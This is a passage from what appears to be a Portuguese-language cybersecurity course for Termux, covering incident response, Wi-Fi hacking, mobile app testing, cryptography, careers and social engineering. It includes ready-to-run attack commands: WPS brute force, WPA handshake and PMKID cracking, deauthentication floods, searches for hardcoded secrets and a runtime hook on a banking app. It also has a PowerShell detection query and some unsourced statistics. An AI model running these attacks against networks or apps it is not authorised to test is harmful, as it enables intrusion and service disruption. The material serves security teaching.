echo -e "\n4. Evidence Preservation:"
echo "# Create memory dump"
dd if=/dev/mem of=/forensics/memory_dump.img
echo "# Preserve system state"
ps aux > /forensics/running_processes.txt
netstat -tulpn > /forensics/network_connections.txt
find /tmp -type f -exec ls -la {} \; > /forensics/temp_files.txt
# 5. System Snapshot
echo -e "\n5. System Snapshot:"
echo "# Create system image"
dd if=/dev/sda of=/forensics/system_image.img
echo "# Hash verification"
md5sum /forensics/system_image.img > /forensics/image_hash.md5
🔧 Erradicação e Recuperação
🗡️ Erradicação:
- • Remove malware completamente
- • Patch vulnerabilidades exploradas
- • Update signatures e rules
- • Rebuild sistemas comprometidos
- • Reset credentials afetadas
- • Validate IOCs removal
🔄 Recovery:
- • Restore from clean backups
- • Gradual service restoration
- • Enhanced monitoring
- • User access validation
- • Performance monitoring
- • Documentation update
Ferramentas e Automação CSIRT
🤖 SOAR Platforms
# TheHive + Cortex - Open Source SOAR
# Installation via Docker
# docker-compose.yml for TheHive
version: '3'
services:
thehive:
image: 'thehiveproject/thehive4:latest'
ports:
- '9000:9000'
environment:
- JVM_OPTS='-Xms1024M -Xmx1024M'
volumes:
- ./thehive/data:/opt/thp/thehive/data
- ./thehive/index:/opt/thp/thehive/index
cortex:
image: 'thehiveproject/cortex:latest'
ports:
- '9001:9001'
volumes:
- ./cortex/application.conf:/etc/cortex/application.conf
# Phantom (Splunk SOAR)
# Commercial platform with playbook automation
# MISP (Malware Information Sharing Platform)
# Threat intelligence and IOC sharing
docker run -it -p 80:80 -p 443:443 coolacid/misp
# Shuffle - Open Source SOAR
# Workflow automation for security teams
docker run -p 3001:3001 -d frikky/shuffle:latest
📊 SIEM Integration
# ELK Stack (Elasticsearch, Logstash, Kibana)
# Wazuh - Open Source SIEM
# Wazuh Manager installation
curl -sO https://packages.wazuh.com/4.x/wazuh-install.sh
bash wazuh-install.sh -a
# Splunk Universal Forwarder
wget -O splunkforwarder.tgz 'https://download.splunk.com/...'
tar -xzf splunkforwarder.tgz
cd splunkforwarder/bin
./splunk start --accept-license
# OSSIM/AlienVault (AT&T Cybersecurity)
# Unified Security Management platform
# Graylog - Log Management
docker run --name mongo -d mongo:4.2
docker run --name elasticsearch -d elasticsearch:7.10.2
docker run --name graylog -p 9000:9000 -d graylog/graylog:4.2
# Custom SIEM Rules for IR
# Splunk Search for lateral movement
index=security EventCode=4624 LogonType=3
| stats count by Account_Name dest
| where count > 10
# ELK Query for suspicious PowerShell
GET /winlogbeat-*/_search
{
"query": {
"bool": {
"must": [
{"match": {"event.code": "4104"}},
{"regexp": {"winlog.event_data.ScriptBlockText": ".*invoke.*expression.*"}}
]
}
}
}
📢 Comunicação e Relatórios de Incidentes
👥 Stakeholders:
- • Executive Leadership (C-Level)
- • IT Operations Team
- • Legal Department
- • Public Relations
- • Regulatory Bodies
- • Law Enforcement (se necessário)
- • Customers/Partners afetados
📋 Elementos do Relatório:
- • Executive Summary
- • Timeline detalhada
- • Impact assessment
- • Root cause analysis
- • Actions taken
- • Lessons learned
- • Recommendations
⚖️ Compliance:
- • LGPD notification (72h)
- • Regulatory reporting
- • Insurance claims
- • Audit requirements
- • Industry disclosure
- • Customer notification
- • Media statements
Wireless Security
Segurança em Redes Sem Fio - Wi-Fi Hacking e Proteção
🌐 SEGURANÇA WIRELESS: O FRONTE INVISÍVEL
As redes sem fio são o ponto de entrada mais comum para ataques! 80% dos ataques cibernéticos começam por vulnerabilidades Wi-Fi.
OBJETIVO: Aprender a identificar, testar e proteger redes wireless usando ferramentas avançadas no Termux.
Framework de Segurança Wireless
1. Recon
Descoberta de Redes
2. Cracking
Quebra de Senhas
3. Monitoring
Monitoramento
4. Protection
Proteção e Defesa
🔍 Fase 1: Reconhecimento Wireless
🛠️ Ferramentas de Descoberta:
- •
iwconfig
- Configuração de interfaces - •
airmon-ng
- Modo monitor - •
airodump-ng
- Scan de redes - •
wash
- Detecção WPS - •
kismet
- Sniffing avançado
📊 Comandos Essenciais:
iwconfig
Ver interfaces wireless disponíveis
airmon-ng start wlan0
Ativar modo monitor
airodump-ng wlan0mon
Escanear redes Wi-Fi
🔓 Fase 2: Cracking de Senhas Wi-Fi
🎯 Ataques Principais:
- WEP: RC4 vulnerável - crack em minutos
- WPA: Handshake capture + wordlist attack
- WPA2: PMKID attack (menos handshakes)
- WPA3: Mais seguro, mas vulnerável a downgrade
- WPS: PIN brute force (8 dígitos)
⚡ Ataques Rápidos:
reaver -i wlan0mon -b [BSSID] -vv
Ataque WPS (se habilitado)
aircrack-ng -w wordlist.txt capture.cap
Crack WPA handshake
hcxdumptool -i wlan0mon -o dump.pcapng
Captura PMKID para hashcat
👁️ Fase 3: Monitoramento e Sniffing
📡 Técnicas Avançadas:
- Deauthentication: Forçar reconexão para capture
- Evil Twin: AP falso para MITM
- Packet Injection: Injetar pacotes na rede
- Channel Hopping: Monitorar múltiplos canais
- Signal Analysis: Análise de força do sinal
🔧 Ferramentas de Monitoramento:
aireplay-ng -0 5 -a [BSSID] wlan0mon
Deauth attack (5 pacotes)
mdk4 wlan0mon d -B [BSSID]
Deauth massivo
tcpdump -i wlan0mon -w capture.pcap
Captura de pacotes
🛡️ Fase 4: Proteção e Boas Práticas
🔒 Configurações Seguras:
- WPA3: Padrão mais seguro disponível
- Desabilitar WPS: Remove vetor de ataque
- Mudar SSID padrão: Evita reconhecimento
- MAC Filtering: Controle de acesso
- Segmentação: Redes guest separadas
- Monitoramento: Logs e alertas
⚠️ Riscos Comuns:
Instalação das Ferramentas Wireless
📦 Pacotes Essenciais:
Aircrack-ng Suite:
pkg install aircrack-ng
Reaver (WPS):
pkg install reaver
Hashcat:
pkg install hashcat
Tcpdump/Wireshark:
pkg install tcpdump wireshark
⚠️ Requisitos de Hardware:
- • Chipset wireless compatível (ex: Atheros, Ralink)
- • Suporte a modo monitor e packet injection
- • Adaptadores externos recomendados para melhor performance
- • Root access necessário para algumas ferramentas
Cenários Práticos de Wireless Security
🎯 Cenário 1: Auditoria Wi-Fi Empresarial
airodump-ng -c 6 --bssid [BSSID] wlan0mon
aircrack-ng -w rockyou.txt capture.cap
🚨 Cenário 2: Detecção de Rogue APs
kismet -c wlan0mon
tcpdump -i wlan0mon -n | grep -i beacon
Mobile Security
Segurança em Dispositivos Móveis - Android & iOS Hacking
📱 SEGURANÇA MOBILE: O DISPOSITIVO NA SUA MÃO
Dispositivos móveis são computadores pessoais! 90% dos usuários não protegem adequadamente seus smartphones e tablets.
OBJETIVO: Aprender a auditar, testar e proteger aplicações móveis usando ferramentas avançadas no Termux e além.
Framework de Segurança Mobile
1. Recon
Análise de Apps
2. Reverse
Engenharia Reversa
3. Testing
Teste de Segurança
4. Protection
Proteção & Hardening
🔍 Fase 1: Análise e Reconhecimento de Apps
🛠️ Ferramentas de Análise:
- •
apktool
- Decompilar APKs - •
jadx
- Decompilador Java - •
dex2jar
- DEX para JAR - •
frida
- Dynamic analysis - •
objection
- Runtime mobile exploration
📊 Comandos Essenciais:
apktool d app.apk
Decompilar APK
jadx -d output app.apk
Decompilar com JADX
frida-ps -U
Listar processos no dispositivo
🔧 Fase 2: Engenharia Reversa e Análise Estática
🎯 Técnicas Principais:
- Manifest Analysis: Permissões e componentes
- Code Review: Análise de vulnerabilidades
- Certificate Pinning: Bypass de pinning SSL
- Obfuscation: Técnicas anti-reversing
- API Analysis: Endpoints e comunicação
⚡ Ataques Comuns:
grep -r "api_key\|secret" decompiled/
Buscar chaves hardcoded
strings app.apk | grep -i password
Buscar strings suspeitas
frida -U -l script.js com.app.package
Hook runtime com Frida
🧪 Fase 3: Teste Dinâmico e Pentesting Mobile
📱 Testes de Segurança:
- Network Interception: MITM com Burp/ZAP
- Root Detection: Bypass de detecção de root
- Jailbreak Detection: Bypass iOS jailbreak
- Biometric Bypass: Ataques a autenticação
- Runtime Manipulation: Modificação em tempo real
🔧 Ferramentas de Teste:
mitmproxy --mode transparent
Interceptar tráfego HTTPS
drozer console connect
Teste de segurança Android
needle
Pentesting iOS
🛡️ Fase 4: Proteção e Hardening Mobile
🔒 Boas Práticas:
- Code Obfuscation: ProGuard/R8 para Android
- Certificate Pinning: Implementar pinning SSL
- Root Detection: Detectar dispositivos rooted
- Anti-Tampering: Proteção contra modificações
- Secure Storage: KeyStore/Keystore iOS
⚠️ Riscos Críticos:
Instalação das Ferramentas Mobile
📦 Pacotes Essenciais:
Android Tools:
pkg install apktool
pkg install dex2jar
pkg install jadx
Runtime Analysis:
pkg install python
pip install frida-tools
pip install objection
⚠️ Requisitos para Mobile Pentesting:
- • Dispositivo Android/iOS para testes
- • ADB (Android Debug Bridge) instalado
- • USB debugging habilitado
- • Permissões de desenvolvedor
- • Root/Jailbreak opcional mas recomendado
Cenários Práticos de Mobile Security
🔍 Auditoria de App Banking
jadx -d banking_app app.apk
frida -U -l storage_hook.js com.banking.app
🚨 Teste de API Mobile
mitmproxy --mode upstream
sqlmap -r request.txt --batch
Cryptography
Criptografia Moderna - Cifras, Hashes e Certificados Digitais
🔐 CRIPTOGRAFIA: A CIÊNCIA DA SEGURANÇA
A criptografia é a base da segurança digital! Sem ela, não há privacidade, autenticidade ou integridade na internet.
OBJETIVO: Dominar algoritmos criptográficos, implementação prática e ataques comuns usando ferramentas no Termux.
Framework de Criptografia
1. Symmetric
Criptografia Simétrica
2. Asymmetric
Criptografia Assimétrica
3. Hashing
Funções Hash
4. PKI
Infraestrutura de Chaves
🔒 Fase 1: Criptografia Simétrica
🛠️ Algoritmos Principais:
- •
AES
- Advanced Encryption Standard (128/256 bits) - •
ChaCha20
- Stream cipher moderno - •
3DES
- Triple DES (obsoleto) - •
Blowfish
- Algoritmo flexível - •
Twofish
- Sucessor do Blowfish
📊 Modos de Operação:
openssl enc -aes-256-cbc -salt -in file.txt -out file.enc
Criptografar com AES-CBC
openssl enc -aes-256-gcm -in file.txt -out file.enc
Criptografar com AES-GCM (autenticado)
gpg --symmetric --cipher-algo AES256 file.txt
Criptografar com GPG
🔄 Fase 2: Criptografia Assimétrica
🎯 Algoritmos RSA & ECC:
- RSA: Baseado em fatoração (1024-4096 bits)
- ECDSA: Curvas elípticas para assinatura
- Ed25519: Curva Edwards moderna
- ECDH: Troca de chaves Diffie-Hellman
- Hybrid: Combinação simétrica/assimétrica
⚡ Geração e Uso:
openssl genrsa -out private.pem 2048
Gerar chave privada RSA
openssl rsa -in private.pem -pubout -out public.pem
Extrair chave pública
ssh-keygen -t ed25519 -C "your_email@example.com"
Gerar chave Ed25519
🔢 Fase 3: Funções Hash e Integridade
📋 Funções Hash:
- SHA-256: Padrão atual (resistente a colisões)
- SHA-3: Nova família Keccak
- BLAKE2: Alternativa moderna ao SHA
- MD5: Obsoleto (vulnerável)
- HMAC: Hash com chave (autenticação)
🔍 Verificação e Ataques:
sha256sum file.txt
Calcular hash SHA-256
openssl dgst -sha256 -hmac "secret" file.txt
Calcular HMAC-SHA256
hashcat -m 0 -a 0 hash.txt wordlist.txt
Crack hash MD5
📜 Fase 4: PKI e Certificados Digitais
🔐 Componentes PKI:
- CA (Certificate Authority): Emite certificados
- CSR (Certificate Signing Request): Solicitação
- CRL (Certificate Revocation List): Lista de revogação
- OCSP: Verificação online de status
- HSTS: HTTP Strict Transport Security
⚠️ Ataques e Vulnerabilidades:
Instalação das Ferramentas de Criptografia
📦 Pacotes Essenciais:
OpenSSL Suite:
pkg install openssl
pkg install openssl-tool
Hash & Crypto Tools:
pkg install hashcat
pkg install john
pkg install gpg
⚠️ Práticas de Segurança:
- • Use sempre algoritmos modernos (AES-256, SHA-256, Ed25519)
- • Evite algoritmos obsoletos (DES, MD5, RC4)
- • Implemente perfect forward secrecy (ECDHE)
- • Use certificados válidos e atualizados
- • Monitore vulnerabilidades em bibliotecas criptográficas
Cenários Práticos de Criptografia
🔐 Criptografia de Arquivos Sensíveis
openssl enc -aes-256-gcm -salt -in secret.txt -out secret.enc
sha256sum secret.txt > secret.sha256
openssl enc -d -aes-256-gcm -in secret.enc -out secret.txt
🔓 Análise de Certificados SSL/TLS
openssl s_client -connect example.com:443 -servername example.com
sslscan example.com
Carreira em CyberSec
Construa uma Carreira de Sucesso em Segurança Cibernética
🚀 CARREIRA EM CYBERSEC: O CAMINHO PARA O SUCESSO
O mercado de cibersegurança cresce 25% ao ano! Há mais de 3 milhões de vagas em aberto globalmente.
OBJETIVO: Guiar você desde o início da carreira até posições sênior, com roadmap claro, certificações e estratégias de crescimento profissional.
Roadmap de Carreira em CyberSec
1. Iniciante
Junior/Trainee
2. Pleno
Analista/Mid-level
3. Sênior
Especialista/Senior
4. Líder
Manager/Director
🌱 Fase 1: Iniciante (0-2 anos)
🎯 Objetivos Iniciais:
- • Aprender fundamentos de redes e sistemas
- • Obter primeira certificação (CompTIA Security+)
- • Desenvolver habilidades básicas em Linux
- • Participar de CTFs e bug bounties
- • Construir portfólio no GitHub
💼 Cargos de Entrada:
R$ 4.000 - R$ 6.000
R$ 3.500 - R$ 5.500
R$ 4.500 - R$ 7.000
👤 Fase 2: Pleno (2-5 anos)
🚀 Certificações Essenciais:
- CEH (Certified Ethical Hacker): Pentesting básico
- CISSP: Gestão de segurança (difícil)
- OSCP: Pentesting prático (muito respeitado)
- CompTIA CySA+: Análise de segurança
- AWS Security: Cloud security
💰 Salários e Oportunidades:
R$ 8.000 - R$ 15.000
R$ 7.000 - R$ 12.000
R$ 9.000 - R$ 16.000
👑 Fase 3: Sênior (5+ anos)
🎖️ Especializações Avançadas:
- Red Team Lead: Coordenação de ataques simulados
- Security Architect: Design de sistemas seguros
- Threat Hunter: Caça a ameaças avançadas
- Forensic Analyst: Investigação digital
- DevSecOps Engineer: Segurança em desenvolvimento
💎 Salários Sênior:
R$ 18.000 - R$ 35.000
R$ 25.000 - R$ 50.000+
R$ 20.000 - R$ 40.000
⭐ Fase 4: Liderança (8+ anos)
🏢 Posições Executivas:
- CISO: Chief Information Security Officer
- CSO: Chief Security Officer
- VP of Security: Vice President of Security
- Security Director: Diretor de Segurança
- Consultor Sênior: Consultoria independente
🎯 Habilidades Executivas:
Ferramentas para Desenvolvimento de Carreira
📚 Plataformas de Aprendizado:
Certificações Online:
Coursera - Cybersecurity Specialization
Udemy - Ethical Hacking Masterclass
TryHackMe - Rooms interativas
Comunidades:
OWASP - Open Web Application Security
DEF CON - Conferência hacker
Reddit r/netsec, r/cybersecurity
⚠️ Dicas para Carreira:
- • Construa um portfólio forte no GitHub com projetos de segurança
- • Participe de CTFs (Capture The Flag) regularmente
- • Contribua para projetos open source de segurança
- • Faça networking em conferências e meetups
- • Mantenha-se atualizado com as últimas ameaças e vulnerabilidades
- • Desenvolva habilidades soft como comunicação e liderança
Cenários de Carreira em CyberSec
🎯 Carreira Técnica (Red Team/Blue Team)
OSCP, CEH, eXPT certificações
SIEM, IDS/IPS, threat intelligence
EnCase, FTK, Volatility, Autopsy
🏢 Carreira Corporativa (Governance/Risk)
LGPD, ISO 27001, NIST, SOX
Risk assessment, BCP, DRP
Estratégia, orçamento, governança
Recursos e Labs
Plataformas de Aprendizado, Laboratórios e Recursos Essenciais
📚 RECURSOS E LABS: SUA BIBLIOTECA DE CONHECIMENTO
Aprender cybersecurity é uma jornada contínua! Aqui você encontra as melhores plataformas, labs e recursos para prática.
OBJETIVO: Fornecer um guia completo de recursos gratuitos e pagos para dominar cada aspecto da segurança cibernética.
Ecossistema de Aprendizado
1. Plataformas
Cursos Online
2. Labs
Prática Hands-on
3. Comunidades
Networking
4. Ferramentas
Recursos Técnicos
🎓 Fase 1: Plataformas de Aprendizado
💎 Plataformas Premium:
- Coursera: Cybersecurity Specializations (Google, IBM)
- Udemy: 500+ cursos de segurança (descontos frequentes)
- Pluralsight: Paths estruturados por carreira
- LinkedIn Learning: Cursos profissionais
- Offensive Security: PWK/OSCP training oficial
🆓 Recursos Gratuitos:
cybrary.it
owasp.org
nist.gov
🧪 Fase 2: Laboratórios Práticos
🎯 CTF Platforms:
- HackTheBox: Máquinas vulneráveis (VIP necessário)
- TryHackMe: Rooms guiadas (gratuito básico)
- CTFtime: Lista de competições CTF
- PicoCTF: CTF educacional (gratuito)
- CyberSecLabs: Labs corporativos
💻 Ambientes de Teste:
Metasploitable:
VM vulnerável para prática
Download no SourceForge
DVWA:
Damn Vulnerable Web App
github.com/digininja/DVWA
VulnHub:
VMs vulneráveis gratuitas
vulnhub.com
👥 Fase 3: Comunidades e Networking
🌐 Fóruns e Reddit:
- r/netsec: Discussões técnicas avançadas
- r/cybersecurity: Notícias e carreira
- r/HowToHack: Tutoriais e dicas
- r/AskNetsec: Perguntas e respostas
- Hacker News: Notícias tech e security
🎪 Conferências:
🔧 Fase 4: Ferramentas e Recursos Técnicos
📖 Documentação Oficial:
- MITRE ATT&CK: Matriz de técnicas de ataque
- CVE Details: Base de vulnerabilidades
- Exploit-DB: Exploits públicos
- Packet Storm: Security tools e papers
- SecurityFocus: Vulnerabilidades e advisories
📰 Fontes de Notícias:
Setup Essencial para Cybersecurity
💻 Distribuições Linux para Security:
Kali Linux:
wget https://kali.org/get-kali/
Distribuição mais popular para pentesting
Parrot Security:
wget https://parrotsec.org/download/
Alternativa leve ao Kali
BlackArch:
wget https://blackarch.org/downloads.html
2.000+ ferramentas de segurança
Termux (Mobile):
pkg install aircrack-ng nmap
Ferramentas básicas no Android
⚠️ Dicas para Ambiente de Aprendizado:
- • Use máquinas virtuais (VirtualBox/VMware) para testes seguros
- • Configure VPN para proteger seu tráfego durante testes
- • Faça backups regulares de suas configurações
- • Aprenda a usar Git para versionar seus scripts e ferramentas
- • Documente tudo que você aprende em um caderno pessoal
- • Pratique regularmente - consistência é mais importante que intensidade
Caminho de Aprendizado Estruturado
📚 Plano de Estudos para Iniciantes
Cybrary, Network+, Linux Academy
CompTIA Security+, TryHackMe
HackTheBox, VulnHub, CTFtime
🎯 Certificações Recomendadas
~R$ 1.200, 3 horas de prova
CEH: ~R$ 800 | OSCP: ~R$ 1.500
CISSP: ~R$ 2.500 | OSCE: ~R$ 1.800
Social Engineering
A Arte da Manipulação Humana: Entenda Para Se Defender
⚠️ AVISO IMPORTANTE
Social Engineering é para DEFESA, não para ataque! Este conteúdo é estritamente educacional para que você possa identificar e se proteger contra essas técnicas.
Usar essas técnicas contra terceiros sem autorização é CRIME e pode resultar em processo criminal e civil. Use apenas em ambientes autorizados de teste.
Fundamentos da Engenharia Social
Observação
Coleta de informações sobre o alvo
Rapport
Estabelecer confiança e conexão
Manipulação
Explorar princípios psicológicos
Exploração
Obter informações ou acesso
🧠 Princípios Psicológicos Explorados
Gatilhos Mentais:
Vieses Cognitivos:
Vetores de Ataque Comuns (Para Conhecer e Defender)
📧 Phishing e Pretexting
📞 Vishing (Voice Phishing)
💬 Smishing (SMS Phishing)
🏢 Tailgating/Piggybacking
🎭 Baiting e Quid Pro Quo
💾 USB/Physical Drops
Estratégias de Defesa Corporativa
🎓 Treinamento de Conscientização
🔒 Controles Técnicos
📋 Políticas e Processos
Testes de Engenharia Social Éticos
🧪 Framework de Testes Autorizados
Pré-requisitos Legais:
Metodologia Ética:
🛡️ Proteção Pessoal Contra Social Engineering
✅ Boas Práticas:
🚩 Sinais de Alerta: